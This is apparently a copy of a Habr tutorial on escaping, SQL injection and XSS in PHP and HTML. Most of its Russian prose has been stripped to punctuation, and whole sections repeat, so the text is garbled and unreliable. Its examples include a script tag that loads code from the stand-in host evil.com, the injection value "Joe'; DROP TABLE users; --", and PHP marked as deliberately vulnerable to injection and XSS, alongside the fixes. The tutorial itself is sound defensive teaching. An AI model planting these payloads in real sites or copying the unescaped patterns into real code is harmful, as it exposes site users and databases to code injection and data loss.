<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
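// Prepared statement: the query text with a ? placeholder is sent to the server first, and the user value is bound separately, so it can never be parsed as SQL — no escaping needed.
// Fix: PDOStatement::execute() takes an ARRAY of parameter values; the original passed the string directly, which fails (TypeError on PHP 8). $pdo is assumed to be a PDO connection opened elsewhere.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));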
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
To keep the XML well-formed, a literal "<" in the text must be written as "&lt;" and a literal ">" as "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
But what about the ampersand (&) itself, the character that introduces an escape? How do we write the literal text "&lt;" once it has a special meaning? XML handles this by making "&" escapable too: a literal "&" is written as "&amp;", so a literal "&lt;" is written as "&amp;lt;".
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is interpolated into the query text unescaped, so a value containing a quote changes the statement itself — see the "Joe'; DROP TABLE users; --" row below. Kept as-is for illustration; the fix is escaping or, better, a prepared statement.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (presumably submitted by users) are echoed into the HTML unescaped, so a body containing a <script> tag is executed in every reader's browser — the JackTR example below. Kept as-is for illustration; the fix is htmlspecialchars() on each value. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping fix: mysql_real_escape_string() backslash-escapes quotes (and a few other characters) so the submitted value can no longer terminate the '...' literal — compare the "Joe'; DROP TABLE users; --" row below.
// Caveats a reviewer would raise here: (1) the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7 — use mysqli or PDO; (2) escaping only protects a value placed inside a quoted string literal, not a bare number, an identifier, or an ORDER BY / LIMIT position; (3) it escapes according to the open connection's character set, so it needs an established connection whose charset matches the query's (set with mysql_set_charset(), not a SET NAMES query). The prepared-statement form below avoids all three problems.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- Escaping fix: htmlspecialchars() converts <, >, & and " into entities, so a submitted <script> tag is displayed as text instead of being executed (the JackTR example below). Caveats: pass ENT_QUOTES and the page charset (e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) so single quotes are escaped as well — without it the output is unsafe inside a single-quoted attribute (the default flags did not include ENT_QUOTES before PHP 8.1); and this is HTML-context escaping only — a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own escaping. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
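// Prepared statement: the query text with a ? placeholder is sent to the server first, and the user value is bound separately, so it can never be parsed as SQL — no escaping needed.
// Fix: PDOStatement::execute() takes an ARRAY of parameter values; the original passed the string directly, which fails (TypeError on PHP 8). $pdo is assumed to be a PDO connection opened elsewhere.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));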
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
To keep the XML well-formed, a literal "<" in the text must be written as "&lt;" and a literal ">" as "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
But what about the ampersand (&) itself, the character that introduces an escape? How do we write the literal text "&lt;" once it has a special meaning? XML handles this by making "&" escapable too: a literal "&" is written as "&amp;", so a literal "&lt;" is written as "&amp;lt;".
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is interpolated into the query text unescaped, so a value containing a quote changes the statement itself — see the "Joe'; DROP TABLE users; --" row below. Kept as-is for illustration; the fix is escaping or, better, a prepared statement.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (presumably submitted by users) are echoed into the HTML unescaped, so a body containing a <script> tag is executed in every reader's browser — the JackTR example below. Kept as-is for illustration; the fix is htmlspecialchars() on each value. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping fix: mysql_real_escape_string() backslash-escapes quotes (and a few other characters) so the submitted value can no longer terminate the '...' literal — compare the "Joe'; DROP TABLE users; --" row below.
// Caveats a reviewer would raise here: (1) the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7 — use mysqli or PDO; (2) escaping only protects a value placed inside a quoted string literal, not a bare number, an identifier, or an ORDER BY / LIMIT position; (3) it escapes according to the open connection's character set, so it needs an established connection whose charset matches the query's (set with mysql_set_charset(), not a SET NAMES query). The prepared-statement form below avoids all three problems.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- Escaping fix: htmlspecialchars() converts <, >, & and " into entities, so a submitted <script> tag is displayed as text instead of being executed (the JackTR example below). Caveats: pass ENT_QUOTES and the page charset (e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8')) so single quotes are escaped as well — without it the output is unsafe inside a single-quoted attribute (the default flags did not include ENT_QUOTES before PHP 8.1); and this is HTML-context escaping only — a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own escaping. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
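// Prepared statement: the query text with a ? placeholder is sent to the server first, and the user value is bound separately, so it can never be parsed as SQL — no escaping needed.
// Fix: PDOStatement::execute() takes an ARRAY of parameter values; the original passed the string directly, which fails (TypeError on PHP 8). $pdo is assumed to be a PDO connection opened elsewhere.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));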
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
Source: https://habr.com/ru/post/182424/